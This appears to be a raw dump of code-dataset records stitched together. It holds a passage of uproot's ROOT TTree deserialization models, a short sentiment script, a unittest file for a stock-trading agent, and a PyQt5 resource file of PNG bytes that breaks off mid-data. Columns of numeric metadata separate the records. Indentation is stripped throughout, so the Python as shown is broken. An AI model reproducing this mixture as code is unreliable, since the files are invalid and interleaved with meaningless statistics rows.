)
)
self._bases.append(
file.class_named("TAttLine", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttFill", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttMarker", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
(
self._members["fEntries"],
self._members["fTotBytes"],
self._members["fZipBytes"],
self._members["fSavedBytes"],
self._members["fWeight"],
self._members["fTimerInterval"],
self._members["fScanField"],
self._members["fUpdate"],
self._members["fMaxEntries"],
self._members["fMaxEntryLoop"],
self._members["fMaxVirtualSize"],
self._members["fAutoSave"],
self._members["fEstimate"],
) = cursor.fields(chunk, _ttree16_format1, context)
self._members["fBranches"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fLeaves"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fAliases"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
if file.options["minimal_ttree_metadata"]:
cursor.skip_after(self)
else:
self._members["fIndexValues"] = file.class_named("TArrayD").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fIndex"] = file.class_named("TArrayI").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fTreeIndex"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fFriends"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fUserInfo"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fBranchRef"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
@property
def member_names(self):
minimal = [
"fEntries",
"fTotBytes",
"fZipBytes",
"fSavedBytes",
"fWeight",
"fTimerInterval",
"fScanField",
"fUpdate",
"fMaxEntries",
"fMaxEntryLoop",
"fMaxVirtualSize",
"fAutoSave",
"fEstimate",
"fBranches",
"fLeaves",
"fAliases",
]
extra = [
"fIndexValues",
"fIndex",
"fTreeIndex",
"fFriends",
"fUserInfo",
"fBranchRef",
]
if self._file.options["minimal_ttree_metadata"]:
return minimal
else:
return minimal + extra
base_names_versions = [
("TNamed", 1),
("TAttLine", 1),
("TAttFill", 1),
("TAttMarker", 2),
]
class_flags = {"has_read_object_any": True}
class_code = None
_ttree17_format1 = struct.Struct(">qqqqdiiiiqqqqq")
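# _ttree17_format1, big-endian: 4 x int64 ("q") -> fEntries, fTotBytes,
# fZipBytes, fSavedBytes; 1 x float64 ("d") -> fWeight; 4 x int32 ("i") ->
# fTimerInterval, fScanField, fUpdate, fDefaultEntryOffsetLen; 5 x int64 ->
# fMaxEntries, fMaxEntryLoop, fMaxVirtualSize, fAutoSave, fEstimate.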
class Model_TTree_v17(uproot.behaviors.TTree.TTree, uproot.model.VersionedModel):
"""
A :doc:`uproot.model.VersionedModel` for ``TTree`` version 17.
"""
behaviors = (uproot.behaviors.TTree.TTree,)
def read_members(self, chunk, cursor, context, file):
if self.is_memberwise:
raise NotImplementedError(
"""memberwise serialization of {0}
in file {1}""".format(
type(self).__name__, self.file.file_path
)
)
self._bases.append(
file.class_named("TNamed", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttLine", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttFill", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttMarker", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
(
self._members["fEntries"],
self._members["fTotBytes"],
self._members["fZipBytes"],
self._members["fSavedBytes"],
self._members["fWeight"],
self._members["fTimerInterval"],
self._members["fScanField"],
self._members["fUpdate"],
self._members["fDefaultEntryOffsetLen"],
self._members["fMaxEntries"],
self._members["fMaxEntryLoop"],
self._members["fMaxVirtualSize"],
self._members["fAutoSave"],
self._members["fEstimate"],
) = cursor.fields(chunk, _ttree17_format1, context)
self._members["fBranches"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fLeaves"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fAliases"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
if file.options["minimal_ttree_metadata"]:
cursor.skip_after(self)
else:
self._members["fIndexValues"] = file.class_named("TArrayD").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fIndex"] = file.class_named("TArrayI").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fTreeIndex"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fFriends"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fUserInfo"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fBranchRef"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
@property
def member_names(self):
minimal = [
"fEntries",
"fTotBytes",
"fZipBytes",
"fSavedBytes",
"fWeight",
"fTimerInterval",
"fScanField",
"fUpdate",
"fDefaultEntryOffsetLen",
"fMaxEntries",
"fMaxEntryLoop",
"fMaxVirtualSize",
"fAutoSave",
"fEstimate",
"fBranches",
"fLeaves",
"fAliases",
]
extra = [
"fIndexValues",
"fIndex",
"fTreeIndex",
"fFriends",
"fUserInfo",
"fBranchRef",
]
if self._file.options["minimal_ttree_metadata"]:
return minimal
else:
return minimal + extra
base_names_versions = [
("TNamed", 1),
("TAttLine", 1),
("TAttFill", 1),
("TAttMarker", 2),
]
class_flags = {"has_read_object_any": True}
class_code = None
_ttree18_format1 = struct.Struct(">qqqqqdiiiiqqqqqq")
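# _ttree18_format1 extends the version-17 layout with fFlushedBytes (a fifth
# leading "q") and fAutoFlush (a sixth trailing "q"), 16 fields in total.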
class Model_TTree_v18(uproot.behaviors.TTree.TTree, uproot.model.VersionedModel):
"""
A :doc:`uproot.model.VersionedModel` for ``TTree`` version 18.
"""
behaviors = (uproot.behaviors.TTree.TTree,)
def read_members(self, chunk, cursor, context, file):
if self.is_memberwise:
raise NotImplementedError(
"""memberwise serialization of {0}
in file {1}""".format(
type(self).__name__, self.file.file_path
)
)
self._bases.append(
file.class_named("TNamed", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttLine", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttFill", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttMarker", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
(
self._members["fEntries"],
self._members["fTotBytes"],
self._members["fZipBytes"],
self._members["fSavedBytes"],
self._members["fFlushedBytes"],
self._members["fWeight"],
self._members["fTimerInterval"],
self._members["fScanField"],
self._members["fUpdate"],
self._members["fDefaultEntryOffsetLen"],
self._members["fMaxEntries"],
self._members["fMaxEntryLoop"],
self._members["fMaxVirtualSize"],
self._members["fAutoSave"],
self._members["fAutoFlush"],
self._members["fEstimate"],
) = cursor.fields(chunk, _ttree18_format1, context)
self._members["fBranches"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fLeaves"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fAliases"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
if file.options["minimal_ttree_metadata"]:
cursor.skip_after(self)
else:
self._members["fIndexValues"] = file.class_named("TArrayD").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fIndex"] = file.class_named("TArrayI").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fTreeIndex"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fFriends"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fUserInfo"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fBranchRef"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
@property
    def member_names(self):
minimal = [
"fEntries",
"fTotBytes",
"fZipBytes",
"fSavedBytes",
"fFlushedBytes",
"fWeight",
"fTimerInterval",
"fScanField",
"fUpdate",
"fDefaultEntryOffsetLen",
"fMaxEntries",
"fMaxEntryLoop",
"fMaxVirtualSize",
"fAutoSave",
"fAutoFlush",
"fEstimate",
"fBranches",
"fLeaves",
"fAliases",
]
extra = [
"fIndexValues",
"fIndex",
"fTreeIndex",
"fFriends",
"fUserInfo",
"fBranchRef",
]
if self._file.options["minimal_ttree_metadata"]:
return minimal
else:
return minimal + extra
base_names_versions = [
("TNamed", 1),
("TAttLine", 1),
("TAttFill", 1),
("TAttMarker", 2),
]
class_flags = {"has_read_object_any": True}
class_code = None
_ttree19_format1 = struct.Struct(">qqqqqdiiiiIqqqqqq")
_ttree19_dtype1 = numpy.dtype(">i8")
_ttree19_dtype2 = numpy.dtype(">i8")
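# Version 19 inserts fNClusterRange (the unsigned "I") into the fixed-size
# block and follows it with two variable-length big-endian int64 arrays,
# fClusterRangeEnd and fClusterSize, read with the dtypes above; each array
# may be preceded by a one-byte "speedbump", hence the context checks below.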
class Model_TTree_v19(uproot.behaviors.TTree.TTree, uproot.model.VersionedModel):
"""
A :doc:`uproot.model.VersionedModel` for ``TTree`` version 19.
"""
behaviors = (uproot.behaviors.TTree.TTree,)
def read_members(self, chunk, cursor, context, file):
if self.is_memberwise:
raise NotImplementedError(
"""memberwise serialization of {0}
in file {1}""".format(
type(self).__name__, self.file.file_path
)
)
self._bases.append(
file.class_named("TNamed", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttLine", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttFill", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttMarker", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
(
self._members["fEntries"],
self._members["fTotBytes"],
self._members["fZipBytes"],
self._members["fSavedBytes"],
self._members["fFlushedBytes"],
self._members["fWeight"],
self._members["fTimerInterval"],
self._members["fScanField"],
self._members["fUpdate"],
self._members["fDefaultEntryOffsetLen"],
self._members["fNClusterRange"],
self._members["fMaxEntries"],
self._members["fMaxEntryLoop"],
self._members["fMaxVirtualSize"],
self._members["fAutoSave"],
self._members["fAutoFlush"],
self._members["fEstimate"],
) = cursor.fields(chunk, _ttree19_format1, context)
tmp = _ttree19_dtype1
if context.get("speedbump", True):
cursor.skip(1)
self._members["fClusterRangeEnd"] = cursor.array(
chunk, self.member("fNClusterRange"), tmp, context
)
tmp = _ttree19_dtype2
if context.get("speedbump", True):
cursor.skip(1)
self._members["fClusterSize"] = cursor.array(
chunk, self.member("fNClusterRange"), tmp, context
)
self._members["fBranches"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fLeaves"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fAliases"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
if file.options["minimal_ttree_metadata"]:
cursor.skip_after(self)
else:
self._members["fIndexValues"] = file.class_named("TArrayD").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fIndex"] = file.class_named("TArrayI").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fTreeIndex"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fFriends"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fUserInfo"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fBranchRef"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
@property
def member_names(self):
minimal = [
"fEntries",
"fTotBytes",
"fZipBytes",
"fSavedBytes",
"fFlushedBytes",
"fWeight",
"fTimerInterval",
"fScanField",
"fUpdate",
"fDefaultEntryOffsetLen",
"fNClusterRange",
"fMaxEntries",
"fMaxEntryLoop",
"fMaxVirtualSize",
"fAutoSave",
"fAutoFlush",
"fEstimate",
"fClusterRangeEnd",
"fClusterSize",
"fBranches",
"fLeaves",
"fAliases",
]
extra = [
"fIndexValues",
"fIndex",
"fTreeIndex",
"fFriends",
"fUserInfo",
"fBranchRef",
]
if self._file.options["minimal_ttree_metadata"]:
return minimal
else:
return minimal + extra
base_names_versions = [
("TNamed", 1),
("TAttLine", 1),
("TAttFill", 1),
("TAttMarker", 2),
]
class_flags = {"has_read_object_any": True}
class_code = None
_ttree20_format1 = struct.Struct(">qqqqqdiiiiIqqqqqq")
_ttree20_dtype1 = numpy.dtype(">i8")
_ttree20_dtype2 = numpy.dtype(">i8")
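# Version 20 keeps the version-19 layout and additionally reads an
# fIOFeatures member (ROOT::TIOFeatures) just before fBranches.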
class Model_TTree_v20(uproot.behaviors.TTree.TTree, uproot.model.VersionedModel):
"""
A :doc:`uproot.model.VersionedModel` for ``TTree`` version 20.
"""
behaviors = (uproot.behaviors.TTree.TTree,)
def read_members(self, chunk, cursor, context, file):
if self.is_memberwise:
raise NotImplementedError(
"""memberwise serialization of {0}
in file {1}""".format(
type(self).__name__, self.file.file_path
)
)
self._bases.append(
file.class_named("TNamed", 1).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttLine", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttFill", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
self._bases.append(
file.class_named("TAttMarker", 2).read(
chunk,
cursor,
context,
file,
self._file,
self._parent,
concrete=self.concrete,
)
)
(
self._members["fEntries"],
self._members["fTotBytes"],
self._members["fZipBytes"],
self._members["fSavedBytes"],
self._members["fFlushedBytes"],
self._members["fWeight"],
self._members["fTimerInterval"],
self._members["fScanField"],
self._members["fUpdate"],
self._members["fDefaultEntryOffsetLen"],
self._members["fNClusterRange"],
self._members["fMaxEntries"],
self._members["fMaxEntryLoop"],
self._members["fMaxVirtualSize"],
self._members["fAutoSave"],
self._members["fAutoFlush"],
self._members["fEstimate"],
) = cursor.fields(chunk, _ttree20_format1, context)
tmp = _ttree20_dtype1
if context.get("speedbump", True):
cursor.skip(1)
self._members["fClusterRangeEnd"] = cursor.array(
chunk, self.member("fNClusterRange"), tmp, context
)
tmp = _ttree20_dtype2
if context.get("speedbump", True):
cursor.skip(1)
self._members["fClusterSize"] = cursor.array(
chunk, self.member("fNClusterRange"), tmp, context
)
self._members["fIOFeatures"] = file.class_named("ROOT::TIOFeatures").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fBranches"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fLeaves"] = file.class_named("TObjArray").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fAliases"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
if file.options["minimal_ttree_metadata"]:
cursor.skip_after(self)
else:
self._members["fIndexValues"] = file.class_named("TArrayD").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fIndex"] = file.class_named("TArrayI").read(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fTreeIndex"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fFriends"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fUserInfo"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
self._members["fBranchRef"] = uproot.deserialization.read_object_any(
chunk, cursor, context, file, self._file, self.concrete
)
@property
def member_names(self):
minimal = [
"fEntries",
"fTotBytes",
"fZipBytes",
"fSavedBytes",
"fFlushedBytes",
"fWeight",
"fTimerInterval",
"fScanField",
"fUpdate",
"fDefaultEntryOffsetLen",
"fNClusterRange",
"fMaxEntries",
"fMaxEntryLoop",
"fMaxVirtualSize",
"fAutoSave",
"fAutoFlush",
"fEstimate",
"fClusterRangeEnd",
"fClusterSize",
"fIOFeatures",
"fBranches",
"fLeaves",
"fAliases",
]
extra = [
"fIndexValues",
"fIndex",
"fTreeIndex",
"fFriends",
"fUserInfo",
"fBranchRef",
]
if self._file.options["minimal_ttree_metadata"]:
return minimal
else:
return minimal + extra
base_names_versions = [
("TNamed", 1),
("TAttLine", 2),
("TAttFill", 2),
("TAttMarker", 2),
]
class_flags = {"has_read_object_any": True}
class_code = None
class_rawstreamers = (
_rawstreamer_TRefTable_v3,
uproot.models.TBranch._rawstreamer_TBranch_v13,
_rawstreamer_TBranchRef_v1,
uproot.models.TH._rawstreamer_TList_v5,
uproot.models.TH._rawstreamer_TCollection_v3,
uproot.models.TH._rawstreamer_TSeqCollection_v0,
uproot.models.TObjArray._rawstreamer_TObjArray_v3,
uproot.models.TBranch._rawstreamer_ROOT_3a3a_TIOFeatures_v1,
uproot.models.TH._rawstreamer_TAttMarker_v2,
uproot.models.TH._rawstreamer_TAttFill_v2,
uproot.models.TH._rawstreamer_TAttLine_v2,
uproot.models.TH._rawstreamer_TString_v2,
uproot.models.TH._rawstreamer_TObject_v1,
uproot.models.TH._rawstreamer_TNamed_v1,
_rawstreamer_TTree_v20,
)
class Model_TTree(uproot.model.DispatchByVersion):
"""
A :doc:`uproot.model.DispatchByVersion` for ``TTree``.
"""
known_versions = {
16: Model_TTree_v16,
17: Model_TTree_v17,
18: Model_TTree_v18,
19: Model_TTree_v19,
20: Model_TTree_v20,
}
_tiofeatures_format1 = struct.Struct(">B")
class Model_ROOT_3a3a_TIOFeatures(uproot.model.Model):
"""
A versionless :doc:`uproot.model.Model` for ``ROOT::TIOFeatures``.
"""
def read_members(self, chunk, cursor, context, file):
if self.is_memberwise:
raise NotImplementedError(
"""memberwise serialization of {0}
in file {1}""".format(
type(self).__name__, self.file.file_path
)
)
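        # The next 4 bytes appear to carry no member data (a header artifact
        # before fIOBits), so they are skipped before reading the single byte.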
cursor.skip(4)
self._members["fIOBits"] = cursor.field(chunk, _tiofeatures_format1, context)
uproot.classes["TTree"] = Model_TTree
uproot.classes["ROOT::TIOFeatures"] = Model_ROOT_3a3a_TIOFeatures
| 48.946095
| 12,249
| 0.607233
| 5,675
| 44,492
| 4.657445
| 0.082643
| 0.385456
| 0.467519
| 0.513034
| 0.838599
| 0.82721
| 0.794446
| 0.77114
| 0.767962
| 0.765313
| 0
| 0.16899
| 0.245482
| 44,492
| 908
| 12,250
| 49
| 0.61835
| 0.014744
| 0
| 0.750306
| 0
| 0.007344
| 0.358654
| 0.263672
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013464
| false
| 0
| 0.007344
| 0
| 0.068543
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
1cb1387d7acf5ec64b382ee61a57173415e57248
| 290
|
py
|
Python
|
ref_2.py
|
TejasReddy9/tsa_finalyr
|
7eee8bb7d489d83c75ffd527a53f556d0665a140
|
[
"MIT"
] | null | null | null |
ref_2.py
|
TejasReddy9/tsa_finalyr
|
7eee8bb7d489d83c75ffd527a53f556d0665a140
|
[
"MIT"
] | null | null | null |
ref_2.py
|
TejasReddy9/tsa_finalyr
|
7eee8bb7d489d83c75ffd527a53f556d0665a140
|
[
"MIT"
] | 1
|
2018-06-30T08:17:43.000Z
|
2018-06-30T08:17:43.000Z
|
import sentiment_mod as s
print(s.sentiment("This movie was awesome! The acting was great, plot was wonderful, and there were pythons..so yea!"))
print(s.sentiment("This movie was utter junk. There were absolutely 0 pythons. I don't see what the point was at all. Horrible movie, 0/10"))
| 58
| 141
| 0.758621
| 52
| 290
| 4.211538
| 0.673077
| 0.054795
| 0.136986
| 0.173516
| 0.246575
| 0.246575
| 0
| 0
| 0
| 0
| 0
| 0.01626
| 0.151724
| 290
| 4
| 142
| 72.5
| 0.873984
| 0
| 0
| 0
| 0
| 0.666667
| 0.744828
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
1cc150b5bd37fc63c63015df794ed2a741d87046
| 2,514
|
py
|
Python
|
4-deep-q-learning/traders/test/tt_trader_test.py
|
dh-ab93/OSS-SAKI
|
c869d2346286de83222a0664694de15c6d26d301
|
[
"Apache-2.0"
] | null | null | null |
4-deep-q-learning/traders/test/tt_trader_test.py
|
dh-ab93/OSS-SAKI
|
c869d2346286de83222a0664694de15c6d26d301
|
[
"Apache-2.0"
] | null | null | null |
4-deep-q-learning/traders/test/tt_trader_test.py
|
dh-ab93/OSS-SAKI
|
c869d2346286de83222a0664694de15c6d26d301
|
[
"Apache-2.0"
] | 1
|
2020-02-24T20:51:18.000Z
|
2020-02-24T20:51:18.000Z
|
from unittest import TestCase
from experts.perfect_expert import PerfectExpert
from framework.order import OrderType
from framework.portfolio import Portfolio
from framework.company import Company
from framework.period import Period
from framework.stock_market_data import StockMarketData
from traders.trusting_trader import TrustingTrader
class TestTrustingTrader(TestCase):
def test_create_tt_trader(self):
expert_a = PerfectExpert(Company.A)
expert_b = PerfectExpert(Company.B)
trader = TrustingTrader(expert_a, expert_b, 'test_color', 'test_name')
self.assertIsNotNone(trader)
self.assertEqual(trader.get_color(), 'test_color')
self.assertEqual(trader.get_name(), 'test_name')
def test_trade_vote_up_stock_a(self):
expert_a = PerfectExpert(Company.A)
expert_b = PerfectExpert(Company.B)
trader = TrustingTrader(expert_a, expert_b, 'test_color', 'test_name')
portfolio = Portfolio(1000.0, {Company.A: 10, Company.B: 10})
stock_market_data = StockMarketData([Company.A, Company.B], [Period.TESTING]).deepcopy_first_n_items(1)
order_list = trader.trade(portfolio, stock_market_data)
self.assertIsNotNone(order_list)
self.assertEqual(len(order_list), 2)
self.assertEqual(order_list[0].type, OrderType.BUY)
self.assertEqual(order_list[0].company, Company.A)
self.assertEqual(order_list[0].amount, 28.0)
self.assertEqual(order_list[1].type, OrderType.SELL)
self.assertEqual(order_list[1].company, Company.B)
self.assertEqual(order_list[1].amount, 10.0)
def test_trade_vote_down_stock_a(self):
expert_a = PerfectExpert(Company.A)
expert_b = PerfectExpert(Company.B)
trader = TrustingTrader(expert_a, expert_b, 'test_color', 'test_name')
portfolio = Portfolio(1000.0, {Company.A: 10, Company.B: 10})
stock_market_data = StockMarketData([Company.A, Company.B], [Period.TESTING]).deepcopy_first_n_items(4)
order_list = trader.trade(portfolio, stock_market_data)
self.assertIsNotNone(order_list)
self.assertEqual(len(order_list), 2)
self.assertEqual(order_list[0].type, OrderType.SELL)
self.assertEqual(order_list[0].company, Company.A)
self.assertEqual(order_list[0].amount, 10.0)
self.assertEqual(order_list[1].type, OrderType.SELL)
self.assertEqual(order_list[1].company, Company.B)
self.assertEqual(order_list[1].amount, 10.0)
| 47.433962
| 111
| 0.71957
| 327
| 2,514
| 5.314985
| 0.17737
| 0.093211
| 0.13809
| 0.165708
| 0.71519
| 0.71519
| 0.71519
| 0.712888
| 0.712888
| 0.712888
| 0
| 0.022105
| 0.172235
| 2,514
| 52
| 112
| 48.346154
| 0.813071
| 0
| 0
| 0.543478
| 0
| 0
| 0.030231
| 0
| 0
| 0
| 0
| 0
| 0.413043
| 1
| 0.065217
| false
| 0
| 0.173913
| 0
| 0.26087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cd22f6e81e040b50bfb33b66d2a3f0eef5cfaa9
| 4,088
|
py
|
Python
|
resources_rc.py
|
anyways-open/qgis-plugins
|
07eedb01e2081207a940ff87bba2b6d67f916a7b
|
[
"MIT"
] | 1
|
2021-02-11T08:34:15.000Z
|
2021-02-11T08:34:15.000Z
|
resources_rc.py
|
anyways-open/impact-qgis-plugin
|
07eedb01e2081207a940ff87bba2b6d67f916a7b
|
[
"MIT"
] | 20
|
2021-01-08T11:13:45.000Z
|
2022-03-05T09:13:37.000Z
|
resources_rc.py
|
anyways-open/qgis-plugins
|
07eedb01e2081207a940ff87bba2b6d67f916a7b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.11.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x02\x1e\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x18\x00\x00\x00\x18\x08\x06\x00\x00\x00\xe0\x77\x3d\xf8\
\x00\x00\x00\x04\x73\x42\x49\x54\x08\x08\x08\x08\x7c\x08\x64\x88\
\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0e\xc4\x00\x00\x0e\xc4\
\x01\x95\x2b\x0e\x1b\x00\x00\x00\x19\x74\x45\x58\x74\x53\x6f\x66\
\x74\x77\x61\x72\x65\x00\x77\x77\x77\x2e\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x2e\x6f\x72\x67\x9b\xee\x3c\x1a\x00\x00\x01\x9b\x49\x44\
\x41\x54\x48\x89\xed\xd4\x3b\x6b\x14\x61\x14\xc6\xf1\xdf\xbb\xbb\
\x23\x42\x04\x83\x41\x1b\x11\xc1\xc6\x42\x10\x41\x45\x31\x45\xd2\
\x88\x36\x16\x16\xe6\x03\x58\x2a\xb6\xb6\x46\x11\x6b\x6f\x95\x1f\
\x21\x7e\x00\x89\x82\x3b\xf1\x06\x81\x40\x10\x3b\x6d\x24\x22\x9a\
\x34\x22\x01\x03\xd9\xec\x1e\x8b\x2c\x6e\x76\x67\x6f\x4a\x3a\xf3\
\x1f\x5e\x98\x77\xe6\x3c\xe7\x39\xe7\xcc\x85\x1d\x06\x90\xb6\x6e\
\x62\x46\xd9\x11\xa5\x42\xd0\x29\xb5\x6e\xe2\x98\x2e\xc6\xba\x25\
\x52\x12\xdd\x0d\x72\x3f\x30\xd2\xa5\x8c\x33\x69\xc2\x62\x5b\xec\
\xac\x03\x32\xa7\x0b\xb1\x25\xeb\x69\xd2\x8b\xd6\xb6\x9d\x51\x64\
\x6d\x2b\xb9\xd7\x99\x1c\xd2\x05\x2b\xca\x96\xa4\x8e\xa3\x21\x6b\
\xf7\xeb\xcf\xb3\x34\x61\xba\xd7\xcd\x34\xe1\x83\xf0\xa5\x5f\x82\
\x7e\x06\x81\x8b\x91\xbb\xd1\x33\xa0\x6a\x8f\x92\x7d\x7f\x6f\x90\
\xdc\x96\xfe\x24\x7e\x10\x55\xd7\x0b\xc9\xe7\x8d\x09\xe3\xc2\x88\
\xe4\xa7\x4a\xf7\x4e\x2a\x85\xaa\xc3\x9d\x34\xb9\x39\x96\xc8\x05\
\x1e\x4b\x1e\x45\x55\xa6\xec\x95\x9a\x65\xaf\x7d\xb3\xe6\xb8\x24\
\xc3\x77\x2b\x16\xd3\x94\x7a\xcc\x69\xa8\x3b\xd4\xb3\x9d\xa8\x3a\
\x51\xb8\x96\xbb\x16\xb9\x46\xe4\xa2\xb9\xea\x91\x7b\x18\x55\xa3\
\xf1\xd2\xd1\x88\xd6\x9b\x18\xa4\x98\x37\xd6\x3e\x8c\x01\xc4\x8c\
\xb2\xfd\xbe\x4a\x96\x84\x9b\x4a\xc6\x85\xbb\x98\x4a\x93\x9e\x0e\
\xd2\x0f\x24\xde\x3a\xdc\xac\xfc\xf2\x96\xae\x3e\x47\xd5\xfd\x61\
\xf4\x9d\xcf\xa0\xc8\xba\x65\xc9\x2a\xae\xc4\xac\xe7\x32\x67\x71\
\x50\xc9\xa7\x61\x0c\x06\x8e\x08\x62\xce\x55\x0d\x4f\x6c\xfe\x02\
\x2a\x78\x67\xd5\xf9\x74\xc9\xaf\x6d\x31\x80\x78\xe3\x98\x9a\xf7\
\x4a\x1a\x32\x7b\xd3\x39\x6b\xc3\xe8\x06\x7d\xc9\x2d\x76\xfb\x28\
\x69\x08\xec\xb2\x31\xac\x6c\x78\x83\x7f\xe4\x7f\x32\x38\x69\x03\
\x0b\x58\x68\x9e\xef\xb0\x3d\xfc\x06\x6c\x26\x87\xc2\x29\x84\x98\
